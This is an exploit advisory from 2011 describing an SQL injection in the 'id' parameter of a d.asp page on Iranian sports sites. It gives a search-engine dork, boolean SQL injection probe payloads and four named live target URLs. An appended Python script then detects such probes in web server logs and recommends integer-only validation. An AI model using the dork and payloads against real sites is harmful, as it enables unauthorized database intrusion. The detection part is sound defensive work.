
Iran Sports Network SQL Injection

Posted on 22 December 2011

############################### HUT CNIS #############################
# Exploit Title: Iran sports network SQL INJECTION Vulnerability
# Date: [2011/10/19]
# Author: S.Azadi
# Google Dork: inurl:d.asp site:.ir
# Vulnerability Type: SQL Injection
# Version: All versions
#---------------------------------------------------------------------

Technical Details:

- SQL INJECTION:
There is a SQL injection vulnerability in the "id" parameter of the "d.asp" page.
http://sitename/d.asp?id=[SQLI]

PoC:
http://sitename/d.asp?id=25928 and 1=0;--
http://sitename/d.asp?id=25928 and 1=1;--

sample:
http://www.irantriathlon.ir/d.asp?id=25928'
http://www.sporttehran.ir/d.asp?id=25921'
http://www.chesstehran.ir/d.asp?id=26403'
http://www.blindsports.ir/d.asp?id=25862'

#
#
#
###########-HUT Center for Network and Information Security-################
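A defender-side check for the pattern described above, added here as an example and not part of the original advisory: it scans IIS W3C logs for requests to d.asp whose id value is not a plain integer. The log lines, IP addresses, field layout and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log lines (documentation-range IPs, not real traffic).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2011-10-19 10:00:01 192.0.2.10 GET /d.asp id=25928 200
2011-10-19 10:00:05 192.0.2.44 GET /d.asp id=25928+and+1=0;-- 200
2011-10-19 10:00:06 192.0.2.44 GET /d.asp id=25928%20and%201=1;-- 200
2011-10-19 10:00:09 192.0.2.44 GET /d.asp id=25928' 500
2011-10-19 10:00:12 192.0.2.10 GET /default.asp - 200
"""

# The ids shown on the page are plain integers, so anything else is anomalous.
NUMERIC_ID = re.compile(r"\d{1,10}")


def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def suspicious_id_requests(text, page="/d.asp", param="id"):
    """Return (client_ip, decoded_value, status) for each non-numeric id."""
    hits = []
    for rec in parse_w3c(text):
        if rec.get("cs-uri-stem", "").lower() != page:
            continue
        for pair in rec.get("cs-uri-query", "").split("&"):
            key, _, raw = pair.partition("=")
            value = unquote_plus(raw)  # decode %20 and + before checking
            if key.lower() == param and not NUMERIC_ID.fullmatch(value):
                hits.append((rec["c-ip"], value, rec["sc-status"]))
    return hits


if __name__ == "__main__":
    for hit in suspicious_id_requests(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule, enforced in d.asp itself before the value reaches the database and combined with a parameterized query, removes the injection point rather than only detecting probes.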

 
